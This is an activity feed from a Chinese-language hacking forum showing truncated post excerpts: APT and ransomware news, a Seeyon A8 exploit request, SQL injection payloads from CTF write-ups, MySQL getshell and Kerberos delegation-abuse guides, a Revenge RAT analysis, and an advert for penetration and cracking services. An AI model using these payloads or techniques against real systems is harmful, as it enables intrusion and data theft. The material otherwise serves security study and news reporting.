Jump to content
请先注册账号再浏览本站!Maak een account aan voordat u deze site bezoekt!

All Activity

This stream auto-updates

  1. Past hour
  2. Today
  3. Yesterday
  4. Last week
  5. Earlier
  6. An advanced persistent threat (APT) actor has been tracked in a new campaign deploying Android malware via the Syrian e-Government Web Portal, indicating an upgraded arsenal designed to compromise victims. "To the best of our knowledge, this is the first time that the group has been publicly observed using malicious Android applications as part of its attacks," Trend Micro researchers Zhengyu Dong, Fyodor Yarochkin, and Steven Du said in a technical write-up published Wednesday. StrongPity, also codenamed Promethium by Microsoft, is believed to have been active since 2012 and has typ
  7. CNHACKTEAM(CHT)中国黑客论坛,又名CHT HACK 建立已有3年之余,以前 我们以匿名者(非anonymous组织)的身份活动于各大网络安全平台,积累了20+团队技术成员,我们在谷歌上也有相当高的评价,我们的唯一域名是www.cnhackteam.org ,www.cnhackteam.com CNHACK团队非我们官方域名,谨防上当受骗。 注册论坛账号问题,论坛公共板块匿名也可浏览。不注册直接可以查看文章,但是很多内部板块需要注册并拥有团队头衔才可以打开浏览。 为什么我们不开放注册? 过多的烂技术文章乱发、过多的广告发布导致我们不想开放注册,本论坛将在7月22日-8月30日开放注册一段时间,敬请关注。目前是可以注册的! 任务接单 团队拥有接单系统,任务一目了然。不会出现漏单、超时不处理的情况。可以放心联系我们的技术人员。 渗透测试、源码审计、逆向破解、调查取证、黑客攻防、等网络安全业务。 技术QQ:2971235687 TG:@H4MrX Fackbook:CNHACKTEAM 推特:@CNHACKTEAM CNHACKTEAM, also known as CHT HACK, has be
  8. 漏洞影响产品版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件V7.1 漏洞情况: 访问/seeyon/htmlofficeservlet出现DBSTEP V3.0 0 21 0 htmoffice operate err” POST包: POST /seeyon/htmlofficeservlet HTTP/1.1 Content-Length: 1121 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: xxxxxxxxx Pragma: no-cache DBSTEP V3.0 355 0 666 DB
  9. MySQL 是世界上最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational Database Management System:关系数据库管理系统)应用软件之一。全球很多著名公司和站点都使用Mysql作为其数据库支撑,并且很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,利用Mysql来getshell、Mysql提权,等等。本文,笔者我对Mysql在渗透测试中的常见的基础利用进行了详细的总结,包括利用MySQL获取webshell、MySQL提权以及几个MySQL的0day漏洞等。 MySQL相关信息收集 不管是你渗透什么玩意儿,信息收集都是首要的一步。在行动之前,我们需要搞清楚,目标主机上是否存在MySQL、MySQL运行在默认的端口还是指定的端口、MySQL的版本信息、MySQL用户信息等等。 Mysql默认端口是3306端口,但也有自定义端口,针对默认端口扫描主要利用扫描软件进行探测。我们可以用nmap等端口扫描工具对MySQL的端口进行扫描。 如果已经获得了目标MySQL的密码,我们可以使用该用户名和密码扫描获取指定IP地址的端口信息以及mysql数据库相关信息:
  10. AWVS是一款自动化应用程序安全测试工具,支持windows平台,主要用于扫描web应用程序上的安全问题,如SQL注入,XSS,目录遍历,命令注入等 xray (https://github.com/chaitin/xray) 是从长亭洞鉴核心引擎中提取出的社区版漏洞扫描神器,支持主动、被动多种扫描方式,自备盲打平台、可以灵活定义 POC,功能丰富,调用简单,支持 Windows / macOS / Linux 多种操作系统,可以满足广大安全从业者的自动化 Web 漏洞探测需求。 awvs 的爬虫很好用,支持表单分析和单页应用的爬取,xray 的扫描能力比较强,速度也更快。 这里简单说明一下如何实现二者联动自动批量扫描漏洞,过程比较简单,xray官方文档里也有介绍,awvs批量扫描脚本也是直接拿的网上某位表哥的(感谢表哥的脚本~),我只是记录一下学习的过程。 首先打开xray的被动代理 xray.exe webscan --listen 127.0.0.1:7777 --html-output report.html 这条命令监听本地7777端口,然后以html格式将扫描结果导出,文件名为report.html 这里先说
  11. 各位大神,有没有视频操作,我有点看蒙了
  12. [toc] 前言 很好的一个题,偏向于真实的实战环境,但是当时没有做出来真的很可惜,幸好赵总在buuctf上复现了这道题,可以让我这个菜鸡得以复现。 解题 进入题目,冬奥会火炬???: 题目给了源码,源码就两个,都非常简单: user.php PHP 1 2 3 4 5 <?php class User{ public $count; } ?> 就定义了一个简单User类。 add_api.php PHP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; // 数组$count的第几个属性赋值为1 if($count[]=1){ $user->count+=1; setcookie("data",serialize($us
  13. [toc] 前言 感觉一晚上考完了高考,刚经历完一模二模三模的你还肝得动吗? easy_sql 经测试登录密码出存在 sql 注入: SQL 1 passwd=0')||extractvalue(1,concat(0x7c,(database()),0x7c))#&uname=123 之后用 sqlmap 跑出两个数据表 users、flag,并且过滤了 information,所以用为无列名注入,用 join…using 爆出字段名: SQL 1 2 3 4 5 passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a)b),0x7c))#&uname=123 // id passwd=0')||extractvalue(1,concat(0x7c,(select * from (select * from flag join flag as a using(id))
  14. 就在一周前发生严重的勒索软件事件后,Colonial Pipeline将其所有系统恢复为可运行状态时,攻击背后的网络犯罪集团DarkSide声称已夺走了基础设施的控制权,理由是执法部门没收了该设备。 该团伙经营的所有黑暗网站,包括其DarkSide Leaks博客,勒索赎回网站以及违约数据内容传送网络(CDN)服务器,都已经不可用,并且在撰写本文时仍然无法访问。此外,根据DarkSide运营商传递给其附属公司的一份说明,据称,他们的加密货币钱包中的资金被盗窃至一个未知帐户。 英特尔471获得的公告说: “目前,这些服务器无法通过SSH访问,并且主机面板已被阻止。” 开发是在DarkSide出于“来自美国的压力”而关闭其勒索软件(RaaS)联盟计划的良好时机,该组织指出,他们将向受攻击的公司的所有分支机构发放解密器。 ,并承诺在5月23日之前补偿所有未清的财务义务。 尽管撤军事件标志着殖民地管道传奇事件的出人意料的转折,但值得注意的是,没有证据公开证实这些说法,引发了人们的担忧,即这可能是一种出口骗局,这是近年来困扰非法黑网 市场的一种卑鄙的策略,或者该团伙给人的印象是,它已从聚光灯下撤退,只是重新塑造品牌并秘密地以另一种形式继续运营,而没有引起不必要的关注。 根据区块链分析公司Elliptic的说法,DarkSide勒索者使用的比特
  15. 概述 该漏洞解决了两个问题 1.禁止协议转换/协议过渡 2.受保护的用户和敏感用户不能被委派 具体设置表现为DC上设置Service1计算机账户为“仅使用Kerberos”而非“使用任何身份验证协议” 域环境 DC:WIN-5CHMN9C4UES.YAYI.local (Windows Server 2012) 域内两台机器: one2008.YAYI.local (Windows Server 2008) WIN-BMIO66D4K15.YAYI.local (Windows 7) 域用户: fwwr joke 传统的约束委派绕过 服务用户: 委派对象:目标机器WIN-5CHMN9C4UES.YAYI.local 常规的约束委派利用: 1. 得到约束委派机器的用户凭证 2. 发现委派用户委派的目标机器 3. 获取RC4利用 powerview查看约束委派的机器: Get-DomainComputer -TrustedToAuth -Properties distinguishedname,msds-allowedtodelegateto | fl Rubeus一条命令实现约束委派: Rubeus.exe s4u /
  16. 参考链接:https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america VT查杀 初始文件 方式:office vba远程模板加载 随机加载http://azulviagens.online/1-9.docx将下载并执行其中一个模板。 每个文件都具有相同的内容(相同的SHA-256:338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9) 模板文件 模板文件(“ 1.docx” …“ 9x.docx”)遵循图4(如下所示)所示的结构。结构中的settings.xml具有指向XLSM文件的“目标”字段,该字段位于DOCX文件结构的“嵌入”目录中。XLSM文件“ Microsoft_Excel_Macro-Enabled_Worksheet.xlsm”到“ Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm”具有相同的内容(相同的SHA-256:32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2)。当Microsoft Wo
  17. 什么是缓冲区溢出? 缓冲区是易失性的内存分配,它们在将数据从一个位置传输到另一位置时临时保存数据。当正在处理的数据超出存储缓冲区的存储容量时,将发生缓冲区溢出。这导致程序覆盖相邻存储器位置中的过大数据,从而导致缓冲区溢出。当我们对char类型的缓冲区进行操作时,将发生缓冲区溢出。 我们将通过一些示例来尝试理解这个概念。例如,缓冲区的设计方式是接受8个字节的数据,在这种情况下,如果用户输入的数据超过8个字节,则超过8个字节的数据将覆盖相邻的内存,从而超过分配的缓冲区边界。最终将产生分段错误,随后出现许多其他错误,从而导致程序执行被终止。 缓冲区溢出的类型 缓冲区溢出有两种类型。让我们讨论两者的简短介绍。 堆栈缓冲区溢出/Vanilla Buffer缓冲区溢出 当程序覆盖缓冲区边界之外的程序的调用堆栈上的内存地址时,就会发生这种情况,缓冲区边界的长度是固定的。在堆栈缓冲区溢出中,多余的数据将被写入位于堆栈上的相邻缓冲区中。由于与堆栈上溢出的相邻内存位置中的内存损坏相关的错误,通常会导致应用程序崩溃。 堆缓冲区溢出 堆是用于管理动态内存分配的内存结构。它通常用于分配在编译时未知大小的内存,因为所需的内存量太大,以致于无法将其装入堆栈中。堆溢出或溢出是堆数据区域中发生的一种缓冲区溢出。基于堆的溢出利用不同于基于堆栈的溢出利用。
  1. Load more activity

Follow: 世界中文黑客论坛由CNHACKTEAM[CHT]创建,汇集国内外技术人员,这是一群研究网安黑客攻防技术领域的专家.

法务要求丨Legal丨закон丨القانون

请在学习期间遵守所在国家相关法律,否则后果自负!

Пожалуйста, соблюдайте законы страны, в которой вы находитесь, во время обучения, или будут последствия!

勉強期間中に該当する国の法律を守ってください。そうでなければ結果は自己責任です。

Please abide by the relevant laws of your country during your study, or you will be responsible for the consequences!

官方旗下项目丨About our project

声明:为净化国内外网络安全请勿发布违反国家国定的文章,团队不参与任何涉及黑色产业/攻击/渗透各国正规网站活动,只做网络安全研究,研究网络攻防技术。

世界中文黑客论坛由CNHACKTEAM(CHT)创建,汇集国内外技术人员,这是一群研究网络安全、黑客攻防技术领域的专家,你也可以加入我们!

黑客攻防  技术问答  0day  Hack News  CHT Team  使用指南  商城/Mall  商城订单查询  捐赠/donations  在线用户  X  联系邮箱email:[email protected]

友情链接丨Link丨Связь дружбы

CNHACKTEAM   CHT team official website     www.hac-ker.com     hacked.com.cn     www.77169.net     www.ddosi.com

申请或请未补上链接者联系我们的邮箱,谢谢!

×
×
  • Create New...

Important Information

Please use your computer to visit our website; Please agree to our website rules!Guidelines